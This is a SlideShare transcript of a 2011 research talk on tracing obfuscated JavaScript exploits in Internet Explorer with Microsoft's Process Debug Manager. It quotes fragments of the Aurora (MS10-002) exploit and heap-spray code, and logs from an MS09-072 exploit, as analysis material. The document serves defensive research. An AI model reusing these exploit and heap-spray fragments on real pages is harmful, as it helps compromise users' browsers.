Jwis2011 ruo ando
Upcoming SlideShare
Loading in...5

Jwis2011 ruo ando






Total Views
Views on SlideShare
Embed Views



0 Embeds 0

No embeds


Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Jwis2011 ruo ando Jwis2011 ruo ando Presentation Transcript

  • Analysis of obfuscated Java Script exploitation using process debug manager Ruo Ando Network Security Institute, National Institute of Information and Communication Technology, Tokyo, Japan
  • Introduction towards alternative Java Script debugger• Nowadays, Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.• Consequently, Java Scripts has become sophisticated with binary coding of attack code and obfuscation using concatenation which imposes a great burden on security analysis.• Unfortunately, there does not exist useful debuggers specified for this kind of Java Script eploitation.• In this paper we propose the application of extension of MS visual studio debugging extension for providing a new techniques for tracing Java Script behavior.• Proposed system could extract features of some representative web attacks such as google Operation Aurora (MS10-002), IE styleObject (MS09-072) exploit.
  • the old new thing;impact and memory of google aurora operation ultra-sophisticated advanced persistent attack • The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee which informs this attack of WhiteHouse on Janurary 2010. • Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. • Ultra sophisticated: The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack. The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets. • Google and china: As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.Official Chinese media responded stating that the incident is part of a U.S. government conspiracy. Aurora operation is said to be Chinese Government’s attempts to wipe out Google from mainland.
  • BACKGROUND: attack vector is very short. But … Can we analyze (or debug) this IE exploitation using commodity probes?<html><head><script> function ev1 (evt) {var sc = unescape("%u9090%u19eb%u4b5b%..) e1 = document.createEventObject (evt);var sss = Array (826, 679, 798, 224, 770, 427, 819, document.getElementById ("sp1").innerHTML = ""; 770, 707, 805, 693, 679, 784, 707, 280, window.setInterval (ev2, 50);238, 259, 819, 336, 693, 336, 700, 259, 819, 336, } 224, 770, 427, 770, 322, 805, 819, 686, function ev2 ()805, 812, 798, 735, 770, 721, 280, 336, 448, 371); {var arr = new Array; p = "¥u0c0d¥uu0c0d¥u0c0d¥u0c0d";for (var i = 0; i < sss.length; i ++) { for (i = 0; i < x1.length; i ++) { arr[i] = String.fromCharCode (sss [i] / 7); x1 [i].data = p;} };var cc = arr.toString (); var t = e1.srcElement;cc = cc.replace (/,/g, ""); }cc = cc.replace (/@/g, ","); </script>eval (cc); </head>var x1 = new Array ();for (i = 0; i < 200; i ++) { <body> x1 [i] = document.createElement ("COMMENT") <span id="sp1"><IMG SRC="aaa.gif" x1 [i].data = "abc"; onload="ev1(event)" width="16" height="16"></span>};var e1 = null;</body> It is impossible to trace the script engines’ behavior allocating memory and gif processing !
  • the new old thing: web attack and Java Script• Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.• Unfortunately again, there have not been striking probing (debugging) frames for tracing Java Script behavior such as google aurora operation said before.• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically.• Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution.• We can conclude Microsoft PDM extension provide new aspect for analyzing malicious Java Script.• Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types.
  • Commodity Debugger is not always enough ! Java Script and its semantic gap• Current popular debugging Malicious Java Script tools such as ollyDBG and Bad thing has been happened winDBG are not optimized (or enough) for tracing the behavior of Web scripting. MS Active Scripting Engine• Sementic gap between kernel / user mode debugger and web Memory Allocate Read/Write application execution layer. File I/O request We can’t estimate the Semantic Gap USER mode debugger event occurred above Can’t understand by naïve memory and what is going on IO request. API. MS Dynamic Link Binaries• Semantic gap means that Jscript.DLL etc probe running in user / kernel mode layer lacks the Native I/O request IRQ packets knowledge of higher level events such as web browser KERNEL mode debugger property change.
  • PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010 and later • PDM and SDM are components of the extension of Microsoft Visual Studio Extension. • PDM and SDM provides higher level of debugging view mainly for web scripting such as Java Script. • Process Debug Manager (PDM) is a component to make all running programs available to VSPackage (Visual Studio debugger components).Manage chain: PDM makes the target processavailable to SDM and DE. Session debug • By registering PDM, we can track themanager (SDM) manages several Debug Engine function call of high-level API invoked(DE). DE uses expression evaluator and symbol by web browser. Also, property changehandler. SDM wraps IDebugExpression2interface to obtain a stack frame with a help of (such as variable substitution) can beDE by IDebugThread2::EnumFrameInfo. logged.
  • Behavior description of Java Script in this paper①File Name r = debugDocument[i]- >GetName(DOCUMENTNAMETYPE_URL,&filenameStr[i]);②Function fDesc[i].pdsf ->GetDescriptionString(0,&functionStr[i]); b2s(functionStr[i],function,BUFLEN);③Code (substitution) debugProperty = funcs->getDebugProperty(f); getPropertyInfoRecursive(debugProperty,props,0);④Code(loop) props- >propertyIsChanged(propInfos[i].m_bstrFullName,propInfos[i].m_bstrVa lue)==TRUE)
  • Sample output: www.yahoo.co.jpStart Logging On: 2011/02/18 19:16:49 Process ID of IEProcess ID:7072MaxDepth 1Process Name:Windows Internet ExplorerFilename:http://www.yahoo.co.jp/ Depth of loggingFunction:JScript global code window:DispHTMLWindow2:{...} err:Object:{...} Function invoked ver:Undefined:undefined YAHOO:Undefined:undefined d:Undefined:undefined $:Undefined:undefined Property change 14:var ver="ga3_ie" ver:String:"ga3_ie" 15:if(typeof YAHOO=="undefined"||!YAHOO) Executed code 15:var YAHOO={} substitute YAHOO:Object:{...} 15:YAHOO.namespace=function(){vara=arguments,b=null,d,e,c;for(d=0;d<a.length;d=d+1){c=(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO") Executed code?1:0;e<c.length;e=e+1){b[c[e]]=b[c[e]]||{};b=b[c[e]]}}ret Loopurn b}……
  • Proposed system: IE initialization and main loop Main loop IApplicationDebugger::onHandleBreakPoint Internet Explorer ①URL: what kinds of URL accessed ? hr = sfDesc[i].pdsf->GetCodeContext(&codeContext); if(hr!=S_OK){goto out ;} hr = codeContext->GetDocumentContext(&docContext[i]); if(hr!=S_OK){goto out;} hr = docContext[i]->GetDocument(&debugDocument[i]); Published by if(hr!=S_OK){goto out;} hr = debugDocument[i]->GetName PDM and SDM (DOCUMENTNAMETYPE_URL,&filenameStr[i]);(VS DGB extension) ②Property Change: ②-1:What kinds of function invoked ? sfDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]); b2s(functionStr[i],function,BUFLEN); ②-2:What kinds of variables changed ? Internet Explorer debugProperty = funcs->getDebugProperty(f); (debuggee) getPropertyInfoRecursive(debugProperty,props,0);
  • Two core interfaces of SDM / PDM• IRemoteDebugApplication Interface This registered interface allows the session debug manager (SDM) to obtain information about programs that have been "published" through the IDebugProgramPublisher2 interface.Outside the debuggerDebugger connect, start and stop• IApplicationDebugger Interface Represents a running application. It does not need to correspond to an operating-system process. Typically, a debugger targets an application for debugging. The Process Debug Manager typically implements the application object.Inside the debuggerCauseBreak, handling breakPoint
  • Publishing IE (1) injecting my callbackshr =PDM->WatchForProviderEvents( 0, method description // Tell the PDM that we want it to stopwatching IDebugProgram NULL, Provider2:: Obtains information about// The PDM GetProvider programs running, filtered in ProcessDat a variety of ways. implementation of this interface does anot require the port parameter IDebugProgram processId, Provider2:: Gets a program node, given a GetProvider specific process ID.// the process id to query ProgramNo de ScriptEngineFilter, IDebugProgram// We are interested in script code Establishes a callback to watch for Provider2:: provider events associated GUID_NULL, WatchForP with specific kinds of roviderEve// no launching engine processes. nts pMyCallback IDebugProgram Establishes a locale for any// callback interface Provider2:: language-specific resources SetLocale needed by the DE. ); Callbacks to inject
  • Publishing IE (2) querying and unmarshaling before launchfor(DWORD pnode = 0;pnode<procData.ProgramNodes.dwCount;pnode++){ IDebugProviderProgramNode2 *dppn; hr = procData.ProgramNodes.Members[pnode] ->QueryInterface(__uuidof(IDebugProviderProgramNode2),(void**)&dppn); if(hr == S_OK){ IRemoteDebugApplication *rda; CHECK 1 QueryInterface: inspects hr = dppn->UnmarshalDebuggeeInterface wheter the object (__uuidof(IRemoteDebugApplication),(void**)&rda); (IE in this case) supports a certain COM interace. If this if(hr == S_OK){ method returns S_OK, procList[numScriptProcs]=processes[cp]; Windows OS increments the object reference count applicationDebugger[numScriptProcs] = new and the application can JSLogApplicationDebugger use the interface. (processId.ProcessId.dwProcessId,rda,maxDepth,maxStack, CHECK 2 heckGlobal); applicationDebugger[numScriptProcs]->startDebugging(); This method is used when the numScriptProcs++; debug engine is running in the Visual Studio process space} and the program being debugged is running in its own process space. OK. Start debugger using Obtains a specified interface across process boundaries. IRemoteDebugApplication Interface
  • Two core interfaces of proposed system: active script debugger interface• IRemoteDebugApplication Interface for connect / start / stop debugger of IE IRemoteDebugApplication::ResumeFromBre Continues an application that is currently in a breakpoint. akPoint IRemoteDebugApplication::CauseBreak Causes the application to break into the debugger at the earliest opportunity. IRemoteDebugApplication::Conn Connects a debugger to this application. ectDebugger IRemoteDebugApplication::DisconnectDebug Disconnects the current debugger from the application. ger IRemoteDebugApplication::GetDebugger Returns the current debugger connected to the application. Provides a mechanism for the debugger IDE, running out-of-process to the IRemoteDebugApplication::CreateInstanceAt application, Application to create objects in the application process. IRemoteDebugApplication::QueryAlive Indicates if the application is responsive. IRemoteDebugApplication::Enum Enumerates all threads known to be associated with the Threads application. IRemoteDebugApplication::GetName Returns the name of this application node. Returns the application node under which all nodes associated with the IRemoteDebugApplication::GetRootNode application are added. IRemoteDebugApplication::EnumGlobalExpr Enumerates the global expression contexts for all languages running in this essionContexts application.
  • Two core interfaces of proposed system: active script debugger interface• IDebugApplication Interface for cause/handle breakpoint of IE method description IDebugProgramProvider Obtains information about programs running, 2::GetProviderProcessDa filtered in a variety of ways. ta IDebugProgramProvider Gets a program node, given a specific process 2::GetProviderProgramN ID. ode IDebugProgramProvider Establishes a callback to watch for provider 2::WatchForProviderEve events associated with specific kinds of nts processes. IDebugProgramProvider Establishes a locale for any language-specific 2::SetLocale resources needed by the DE. Visual Studio Debugging Extensibility: http://msdn.microsoft.com/en-US/library/bb147088%28v=VS.80%29.aspx
  • Property change detection in the main loopDigging stack frames online Inspecting stack frames①Get Function Name typedef structsfDesc[i].pdsf- tagDebugStackFrameDescriptor { >GetDescriptionString(0,&functionStr[i]); IDebugStackFrame *pdsf; DWORD_PTR dwMin; DWORD_PTR dwLim;②Get File and URL BOOL fFinal;DebugCodeContext* codeContext; IUnknown *punkFinal; }hr = sfDesc[i].pdsf- DebugStackFrameDescriptor; >GetCodeContext(&codeContext);③Get Property Change typedef struct DebugPropertyInfo{debugProperty = funcs- DBGPROP_INFO_FLAGS dwValidFields; >getDebugProperty(f); BSTR bstrName;getPropertyInfoRecursive(debugProperty, BSTR bstrType; BSTR bstrValue;props,0); BSTR bstrFullName; IDebugStackFrame::GetCodeContext DBGPROP_ATTRIB_FLAGS dwAttrib; IDebugStackFrame::GetDescriptionString IDebugProperty* pDebugProp; IDebugStackFrame::GetLanguageString }; IDebugStackFrame::GetThread
  • Experiment①Google Aurora Attack (MS10-002 HTML object memory corruption)MS10-002 is HTML object memory corruption, known as Google aurora attack.This cyberattack began in mid 2009 and first publicly disclosed by Google on January by a blog post.The attack was also named as ”Operation Aurora” by Dmitri Alperovitch. McAfee Labsdiscovered that Aurora was included file path on the attacker’s machine.• MSB-MS10-002• CVE-2010-0249• OSVDB-61697② Active Directory Federation Service Attack(MS09-072 ATL headers vulnerability)MS09-072 is the vulnerability of Internet Explorer, which affects Microsoft Active DirectoryFederation Service (ADFS). In MS07-072, an active X control build with Microsoft ActiveTemplate Library (ATL) headers could allow advisory to execute remote code. The ATLvulnerability prompted an out-of-band release earlier this year from Microsoft.• MSB-MS09-072• CVE-2009-3672• OSVDB-50622• BID-37085
  • Experiment Google Aurora Attack1: Start Logging On: 2011/05/30 23:13:542: Process ID:36523: MaxDepth 24: Process Name:Windows Internet Explorer5: Filename: Function:JScript global code7: window:DispHTMLWindow2:{...}8: window.clientInformation:Object:{...}9: --- snip ---10: window.event:IHTMLEventObj:null11: window.external:Object:{...}12: window.frameElement:IHTMLFrameBase:null13: window.window:DispHTMLWindow2:{...}14: pNrDlDURxbASLo:Undefined:undefined15: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined16: CLLFyYpDX:Undefined:undefined Payload17: HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined18: 5:var pNrDlDURxbASLo = 0c053e66...19: pNrDlDURxbASLo:String:"0c053e66..."20: 6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl = 21: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]"22: 7:i = 023: i:Number:0 Anomaly Loop detected!24: 7:i<pNrDlDURxbASLo.length25: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += Exploit or Heap spray?26: String.fromCharCode27: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))28: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]" var n=unescape("%u0c0d%u0c0d");29: 7:i+=230: i:Number:2 while(n.length<=524288) n+=n;31: 7:i<pNrDlDURxbASLo.length32: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += n=n.substring(0,524269-sc.length);33: String.fromCharCode var x=new Array();34: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))35: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]" for(var i=0;i<200;i++) {x[i]=n+sc;}
  • Experiment MS09-0721: Start Logging On: 2011/05/31 00:18:462: Process ID:6883: MaxDepth 24: Process Name:Windows Internet Explorer5: Filename: Function:JScript - onload function7: 20:sFsSfxRecSIXauNmBnB()8: Function:sFsSfxRecSIXauNmBnB9: DRBfZcPV:Undefined:undefined Payload?10: AcHKfoIb:Undefined:undefined14: 6:var DRBfZcPV = unescape15: DRBfZcPV:Object:{...}16: 7:var AcHKfoIb =DRBfZcPV(%u350d%ufc03%u747a%u4976%u2593%f9f% )17: AcHKfoIb:String:"*******"18: 8:var OSGwFEcn =19: DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0")20: OSGwFEcn:String:"**"21: 9:var pGgrrYDr = 20 + AcHKfoIb.length22: pGgrrYDr:Number:52023: 10:while (OSGwFEcn.length < pGgrrYDr)24: 10:OSGwFEcn +=OSGwFEcn Anomaly loop detected!25: OSGwFEcn:String:"****"26: 10:while (OSGwFEcn.length < pGgrrYDr) Malicious code is scanning27: 10:OSGwFEcn+=OSGwFEcn Memory …28: OSGwFEcnn:String:"********"29: 10:while (OSGwFEcn.length < pGgrrYDr)30: 10:OSGwFEcn+=OSGwFEcn31: OSGwFEcn:String:"******************"32: 10:while (OSGwFEcn.length < pGgrrYDr)33: 10:OSGwFEcn+=OSGwFEcn34: OSGwFEcn:String:"**********************************"I
  • Conclusion and further worksWriting alternative Java Script debugger is exciting challenge!It works partly now.• Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.• However and further work: there have not been striking probing (debugging) frames for tracing Java Script behavior.• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically.Extensibility for other operating systems and platforms• Windows OS is the shortest path to understand Java Script behavior. Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution. Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types.IT IS NOT ENOUGH :- Memory dump is necessary, eventually idea: anomaly loop detection of Java Script + active memory monitoring by DLL injection etc.